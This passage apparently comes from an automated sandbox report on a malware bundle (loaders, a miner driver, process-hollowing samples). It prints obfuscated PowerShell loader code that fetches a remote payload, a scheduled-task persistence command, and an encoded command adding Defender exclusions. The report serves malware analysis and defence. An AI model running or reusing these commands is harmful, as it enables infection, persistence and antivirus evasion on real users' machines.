conN,anTIll Fe1M.c0 Bo.Ha.0Ypp;Gen GloWHjliInsnCaf6 an4flu; Un gsx Fi6Chr4 Pr;Dik S crForv C.:Per1 St3 ow4Ind. rn0Arn) I IneGFale DucpotkShioRes/Bo 2,aa0La 1Nig0kv 0 ev1Bod0For1Skr an,F itiUnsrBane nfM aoS uxSti/kon1N l3 dg4Drm.d.u0';$Bramantip=Bebrejd ' ru ShsDeleF rRDmp- ShATr gSmiEMilNAmbt';$Forskrev=Bebrejd 'SmahPapttvatFempChesSte:F r/Sy,/ ShfS ni MolJete udBaanHex.K,aeS iuTax/nivlNeumLaejKamMgen1 gtIOvetA.kibroFJarCSwiHBocjU cYK eABe 4KapJRauNBruRA aBMerYModBTr 3Mar4Sc / SaUUnonS cdbareon r vb Opa Akl ydaSelnDelcAboe rurStan,oleHjasTwi.tarjBebaS ovMana';$Sjaslikkens247=Bebrejd ' Op>';$Facies=Bebrejd 'NonITraE SuX';$Torrentially21='Topazolite';$Gordiaceous='\Transitvarerne.Fli';Shoepacs137 (Bebrejd 'F.l$HjfGAfsl leOAerb BraTeaL n:IrrPForR.dde heGNebn .peIn NBadoForlGr OUn,nopfEpre9Str4.il=gol$gi EnedN,kiv,ph:sydA VeP EkPge DMetAResTRe,aDec+ind$Plag NooDelRAskD NaI,ilaUnscAlpeTh Oas,uXylS');Shoepacs137 (Bebrejd 'lan$RetG E,l TiORelBLjba polO e: Fos utyTruDRekFTavO ViR ,ahPaeN,pig ScEAukNUnsE.ty= Se$ A,F.beO.ndrS.rSS ckKolRProEEnsV Dr..xcsEjePRutLsatIhottDyn(Ego$ uts E j InaBruSAbsl E i.usKKlikkoneLivN .as va2.pl4Hex7 u)');Shoepacs137 (Bebrejd $Boligkonsulentens);$Forskrev=$Sydforhngene[0];$Smutches=(Bebrejd 'Com$ ImgPreLTitOWaxbStraPrelTre: AusAf ASilP FiSFedU .oCAfgKI gEIncRSpaSLo =Runn aE VawMor- ndoPa.b,enJRapeF,dc.onTU,m OgdsPl,YH,nS,inTQuiE ,im Li..ta$SecRSjlETriPBruRT.iSNonEAntn,ouT B.ARotT eIGenO .yNSkrsCosu end BlGSupI nfGimt .ds');Shoepacs137 ($Smutches);Shoepacs137 (Bebrejd ' h$CatSUnoaTampnrrs TuuDescSnikEnde FerTo s pu.BnkH E,e tea VedLumeRebrBilsSub[Op $ unBZerrAlba Inm braVe npartSpoiKonp,ta]Tel= L $,peLOu a tonBuddTikbP roignf iso Oprbr eEftnFabiFornJasgSensMe 1Ens7 Sn3');$Udfordrernes229=Bebrejd 'P.d$SkaSJ.ra BrpAr.s F,uCouc PekHoleE sr Cos xy.S dD ,no raw knnRefl Bio Sna Bud,epFAboiPrelTwieFol( Sp$CanF Gro rerCyms P.kNewrSomeChrvInv,Bev$ForKIvrohavaPenlt piNert E i B.oO tnT.ie .nn C,s Al)';$Koalitionens=$Pregnenolone94;Shoepacs137 (Bebrejd 'Sku$S,oGInclGusoReib SyaDisLFol:BesnStrOSurnPalROvie ,uM OvEImmdL,gITh aTorb WaLScaEC u=Gaa( ArTBlaeHersRg.tSup-
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uforfrdetheds181; function Yasmak($Unsatanical){$Puritanic=3;do{$Joumbos+=$Unsatanical[$Puritanic];$Puritanic+=4} until(!$Unsatanical[$Puritanic])$Joumbos}function Seksualhygiejnen($Unshowmanlike){ .($bluenoser) ($Unshowmanlike)}$Calamondin=Yasmak 'T nn onEchaTGra.Ke W';$Calamondin+=Yasmak 'Jo EU sbSt,cCoulHarI.tue InnRebT';$Longwise=Yasmak 'ForMMi.oSorzGaviF rl,irlA faEnt/';$Stavkirkes=Yasmak ' AmTovel WasI n1Avn2';$Litterateur36='S.e[Plan .oeFreTFus.BusS IneT urSamv TaI Brc HueN npCe oMiniBilNOliTAtoMFimA AknLenAIvrGHese arUnc] Mo: a:halSAfkEElecF ruLilrMyxID rtMacY,egPPetrProo .aT,alo NoCAtooP rl B = re$ .aST xtMisA GavEmbKUdkiAccRfemkPreeForS';$Longwise+=Yasmak 'Low5 k .me 0Ov Snd(YasWUnhi,ocnUnbdNovoTrawM ds Sp OveNAnmTFra Ine1 ic0.nt. tr0Kli; ro AttWAkviI dn Un6 Ba4Lab;Fi, K txPre6Hel4No ;,cc BrrDisvOv : h1Pra3Muf4 H .Qu 0Sup) Un F rG .neKyscG.sk,amoGrn/Liv2Fra0Ank1Res0Non0 Pa1Can0 an1Mio ConFA.yigu.rLg e .yf FioHypxMa,/Kvl1Br 3Lns4Tra. on0';$Daarlighed=Yasmak 'midU UnSRepeT arVes-StrAFakG UneProN M T';$Radioactive=Yasmak ' Mah ertExotSkipA,ts nd:,at/pol/ComfNoni ilEt eSamdUnan.ro.floe H uLis/IntlordmAffjBonM ny1ManI .nt Tai,beFBruCE,uHIrrjkoeYFisATer4ApaJDahNOphRWeeBSvvYForB a3Ly 4B,f/ OvODepuHomt ResForoH ba .ar if. artPelo R c';$Stbeformens=Yasmak 'San>';$bluenoser=Yasmak 'SkriProeTilx';$Courtmartial='Hale';$Bacillebrerens='\Autonephrectomy.Noc';Seksualhygiejnen (Yasmak 'Pre$ForGHjeLUndoSchb MoaHallStr:SheUNadnDesCFrdUInhsS.ohAlfiF noLanNGarE orDPr =Ord$ SaEHypNPr.vBe,: UdA rsP N PPaud ekAViqt FuaMal+Bre$LamBPorA apCOutI ,ol arLS.rE rybOver.nmE ToRForET ln.eas');Seksualhygiejnen (Yasmak 'Sla$ Cog HalSjaO,kiBMura ppLRec:IllMA hYBorS CetThrIpolk te,ipr U.efannHal1Enr4Ant1 el= nn$ esr AkALigdG viComOUbna giCSanTerii,akVFore ,a.KursMagp,ncL uiIT oT in(Kmp$RouSAfsTDe BObsETenf ceoDacr PamFliE R nPl sLas)');Seksualhygiejnen (Yasmak $Litterateur36);$Radioactive=$Mystikeren141[0];$Recognise=(Yasmak 'Kip$LgfgBooLPreo DabXenaFinlPre:na eCheNTrnAstymHaleunmL JaI H,nBliGU.hSEla=SpanfulEDecW os- .io xcBO vjIndECouc ,vt P MoS.oaYPres ibt Flesc mr.l.Rad$EkscFugA ptl ,rALi,MEksoStunSupdUpcIKjon');Seksualhygiejnen ($Recognise);Seksualhygiejnen (Yasmak ' Uf$ B E denWuzaCymmPreeMi,l leiBernStagSubsO e. dHBlye Ala .odSp eBi,rUncsKe,[Abi$WalDOr.awyvaKilrBryl,ntiT,lglarhBese,epdEd ]Myr=Sys$.paLKonoRetnNongG nwStuia.tsEjee');$Upcutting173=Yasmak 'S g$Ju,EPr.nChuaFalma,re BrlReriS lnSkagChus Kr.DiaDMoyo tewTr nB tlGlao PoaAk dThyFBe.ihyll uneGem(Phi$SipR InaSupdSariUncoOveaIt cTaatFo iRunvHj e H ,Ta $ irV ,ii OtdRepe anbFloe .og yprH,oetoftBlosLa,1 Ud7 l 9d k)';$Videbegrets179=$Uncushioned;Seksualhygiejnen (Yasmak 'P r$ iGSquLSelopl bBeha arLSka:ScrsCoitTafRC aufrdkPertBakU ivRAr.eUs.RSape ,us Pr=Pa (ColtSplE BrS BaTB l-Ab.pblaA eT lahDec Ser$ .aVlocI edVe EPh BLigECligtror aeO,etFleSFra1De,7S e9Dev)');while (!$Struktureres
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA=="
                            Source: C:\Users\user\Downloads\haus\Loader.exeCode function: 10_2_00007FF6B95813A0 EntryPoint,RtlNormalizeProcessParams,RtlAllocateHeap,NtTerminateProcess,10_2_00007FF6B95813A0
                            Source: C:\Users\user\Downloads\haus\Loader.exeCode function: 10_2_00007FF6B9581070 RtlAdjustPrivilege,wcscpy_s,RtlInitUnicodeString,NtUnloadDriver,RtlAdjustPrivilege,NtQuerySystemInformation,NtQuerySystemInformation,RtlAllocateHeap,NtQuerySystemInformation,RtlFreeHeap,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation,ReadConsoleInputW,10_2_00007FF6B9581070
                            Source: C:\Users\user\Downloads\haus\Loader.exeCode function: 10_2_00007FF6B9581480 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,_stricmp,VirtualFree,LoadLibraryExW,GetCurrentProcess,K32GetModuleInformation,VirtualFree,GetProcAddress,10_2_00007FF6B9581480
                            Source: C:\Users\user\Downloads\haus\Loader.exeCode function: 10_2_00007FF6B9581760 NtCreateFile,RtlInitUnicodeString,NtLoadDriver,NtCreateFile,NtDeviceIoControlFile,NtDeviceIoControlFile,RtlInitUnicodeString,NtLoadDriver,NtCreateFile,NtDeviceIoControlFile,RtlInitUnicodeString,NtUnloadDriver,NtClose,10_2_00007FF6B9581760
                            Source: C:\Users\user\Downloads\haus\sel1.exeCode function: 12_2_0040309C Sleep,GetModuleFileNameA,GetModuleFileNameW,GetVolumeInformationA,GetModuleHandleA,GetModuleHandleA,NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,CreateProcessInternalA,Sleep,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,ExitProcess,12_2_0040309C
                            Source: C:\Users\user\Downloads\haus\traf.exeCode function: 15_2_00401249 NtAllocateVirtualMemory,15_2_00401249
                            Source: C:\Users\user\Downloads\haus\traf.exeCode function: 15_2_001721B4 CreateFileMappingA,MapViewOfFile,lstrcatW,lstrcat,CreateProcessInternalA,NtQueryInformationProcess,NtCreateSection,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,NtCreateSection,CloseHandle,ResumeThread,Sleep,ExitProcess,15_2_001721B4
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00453540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,16_2_00453540
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_004533C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,16_2_004533C0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00452720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,16_2_00452720
                            Source: C:\Users\user\Downloads\haus\Loader.exeCode function: 10_2_00007FF6B9581760: NtCreateFile,RtlInitUnicodeString,NtLoadDriver,NtCreateFile,NtDeviceIoControlFile,NtDeviceIoControlFile,RtlInitUnicodeString,NtLoadDriver,NtCreateFile,NtDeviceIoControlFile,RtlInitUnicodeString,NtUnloadDriver,NtClose,10_2_00007FF6B9581760
                            Source: C:\Users\user\Downloads\haus\Loader.exeCode function: 10_2_00007FF6B9581070 RtlAdjustPrivilege,wcscpy_s,RtlInitUnicodeString,NtUnloadDriver,RtlAdjustPrivilege,NtQuerySystemInformation,NtQuerySystemInformation,RtlAllocateHeap,NtQuerySystemInformation,RtlFreeHeap,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation,ReadConsoleInputW,10_2_00007FF6B9581070
                            Source: C:\Users\user\Downloads\haus\conhost.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sys
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D1B380_2_00007FF6D80D1B38
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D7BD40_2_00007FF6D80D7BD4
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D6E700_2_00007FF6D80D6E70
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80B80200_2_00007FF6D80B8020
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80DA9980_2_00007FF6D80DA998
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80B9A340_2_00007FF6D80B9A34
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80BA26D0_2_00007FF6D80BA26D
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D2AE40_2_00007FF6D80D2AE4
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C132C0_2_00007FF6D80C132C
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80CEB240_2_00007FF6D80CEB24
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D531C0_2_00007FF6D80D531C
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C3B880_2_00007FF6D80C3B88
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C24200_2_00007FF6D80C2420
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C44500_2_00007FF6D80C4450
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C6CF00_2_00007FF6D80C6CF0
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C0D180_2_00007FF6D80C0D18
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C15380_2_00007FF6D80C1538
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80B8DC00_2_00007FF6D80B8DC0
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80CAE200_2_00007FF6D80CAE20
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80CF6380_2_00007FF6D80CF638
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D1B380_2_00007FF6D80D1B38
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D76880_2_00007FF6D80D7688
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D4E800_2_00007FF6D80D4E80
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C96D00_2_00007FF6D80C96D0
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C0F1C0_2_00007FF6D80C0F1C
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C37500_2_00007FF6D80C3750
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C173C0_2_00007FF6D80C173C
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C3F8C0_2_00007FF6D80C3F8C
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C27B80_2_00007FF6D80C27B8
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80CEFB80_2_00007FF6D80CEFB8
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C90200_2_00007FF6D80C9020
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80B989B0_2_00007FF6D80B989B
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D70EC0_2_00007FF6D80D70EC
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80C11280_2_00007FF6D80C1128
                            Source: C:\Users\user\Downloads\haus\Loader.exeCode function: 10_2_00007FF6B958107010_2_00007FF6B9581070
                            Source: C:\Users\user\Downloads\haus\Loader.exeCode function: 10_2_00007FF6B958148010_2_00007FF6B9581480
                            Source: C:\Users\user\Downloads\haus\Loader.exeCode function: 10_2_00007FF6B958176010_2_00007FF6B9581760
                            Source: C:\Users\user\Downloads\haus\sel1.exeCode function: 12_2_0040100012_2_00401000
                            Source: C:\Users\user\Downloads\haus\ABC.exeCode function: 13_2_02E12E8013_2_02E12E80
                            Source: C:\Users\user\Downloads\haus\ABC.exeCode function: 13_2_02E1375013_2_02E13750
                            Source: C:\Users\user\Downloads\haus\ABC.exeCode function: 13_2_02E12B3813_2_02E12B38
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_0045272016_2_00452720
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052DDD9B16_2_052DDD9B
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052DBC5E16_2_052DBC5E
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052BC82416_2_052BC824
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052E252116_2_052E2521
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052ED5E216_2_052ED5E2
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052EA46F16_2_052EA46F
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052D04C416_2_052D04C4
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052E07E516_2_052E07E5
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052E166F16_2_052E166F
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052BC23916_2_052BC239
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052BFD6C16_2_052BFD6C
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052C6C1716_2_052C6C17
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052C1CE516_2_052C1CE5
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052ECE6616_2_052ECE66
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052D6E4316_2_052D6E43
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052F1EC016_2_052F1EC0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052CE9EC16_2_052CE9EC
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052F181416_2_052F1814
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052DC85016_2_052DC850
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052E8B5F16_2_052E8B5F
                            Source: C:\Users\user\Downloads\haus\vapo.exeCode function: 19_2_00007FFD3293839219_2_00007FFD32938392
                            Source: C:\Users\user\Downloads\haus\vapo.exeCode function: 19_2_00007FFD32930C6D19_2_00007FFD32930C6D
                            Source: C:\Users\user\Downloads\haus\vapo.exeCode function: 19_2_00007FFD3293A49D19_2_00007FFD3293A49D
                            Source: C:\Users\user\Downloads\haus\vapo.exeCode function: 19_2_00007FFD329375E619_2_00007FFD329375E6
                            Source: C:\Users\user\Downloads\haus\ABC.exeCode function: 23_2_00A22E8023_2_00A22E80
                            Source: C:\Users\user\Downloads\haus\ABC.exeCode function: 23_2_00A2375023_2_00A23750
                            Source: C:\Users\user\Downloads\haus\ABC.exeCode function: 23_2_00A22B3823_2_00A22B38
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_0068474024_2_00684740
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_0068475024_2_00684750
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_0068D7BC24_2_0068D7BC
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_04F29FF824_2_04F29FF8
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_04F2D4A024_2_04F2D4A0
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_04F2D49124_2_04F2D491
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_04F2CD1024_2_04F2CD10
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_07082E8024_2_07082E80
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_07085CA024_2_07085CA0
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_0708C4B824_2_0708C4B8
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_0708933824_2_07089338
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_0708AA2024_2_0708AA20
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_0708714824_2_07087148
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_070F240824_2_070F2408
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_070F345224_2_070F3452
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_070FC01924_2_070FC019
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_070F4BA824_2_070F4BA8
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_070F147824_2_070F1478
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_0718BE9024_2_0718BE90
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_0771E19024_2_0771E190
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_07717A7024_2_07717A70
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_0771D8F824_2_0771D8F8
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_077108E024_2_077108E0
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_0771D47024_2_0771D470
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_0771D46024_2_0771D460
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_08AE004024_2_08AE0040
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_08AEEBF824_2_08AEEBF8
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_08AEA54024_2_08AEA540
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_08AEAE1024_2_08AEAE10
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_08AEA1F824_2_08AEA1F8
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_00F1F2E426_2_00F1F2E4
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051B670026_2_051B6700
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051B977026_2_051B9770
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051BA04026_2_051BA040
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051BB33826_2_051BB338
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051BC87826_2_051BC878
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051BDA8826_2_051BDA88
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051B051826_2_051B0518
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051B050826_2_051B0508
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051B942826_2_051B9428
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051B66F026_2_051B66F0
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051BB32726_2_051BB327
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051BC85026_2_051BC850
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 26_2_051BDA7826_2_051BDA78
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E123D827_2_02E123D8
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10F4827_2_02E10F48
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E13A2127_2_02E13A21
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E1230127_2_02E12301
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10AD527_2_02E10AD5
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10A5727_2_02E10A57
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10A2627_2_02E10A26
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10BC727_2_02E10BC7
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10B9627_2_02E10B96
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10B1A27_2_02E10B1A
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E108EA27_2_02E108EA
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E108AF27_2_02E108AF
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E109C927_2_02E109C9
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E1099A27_2_02E1099A
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10E5027_2_02E10E50
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10E2127_2_02E10E21
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10C9A27_2_02E10C9A
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E12C6827_2_02E12C68
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E12C5827_2_02E12C58
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10C5A27_2_02E10C5A
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10C2927_2_02E10C29
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10DDE27_2_02E10DDE
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10D3A27_2_02E10D3A
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E10D0C27_2_02E10D0C
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeCode function: 27_2_02E11C3227_2_02E11C32
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_0244474028_2_02444740
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_0244D7BC28_2_0244D7BC
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_025F746028_2_025F7460
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_025F1C4028_2_025F1C40
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_025F007828_2_025F0078
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_025F008828_2_025F0088
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_025F1C3028_2_025F1C30
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_04FF9FF828_2_04FF9FF8
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_04FFD4A028_2_04FFD4A0
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_04FFD49128_2_04FFD491
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_04FFCD1028_2_04FFCD10
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_07212E8028_2_07212E80
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_07215CA028_2_07215CA0
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_0721C4B828_2_0721C4B8
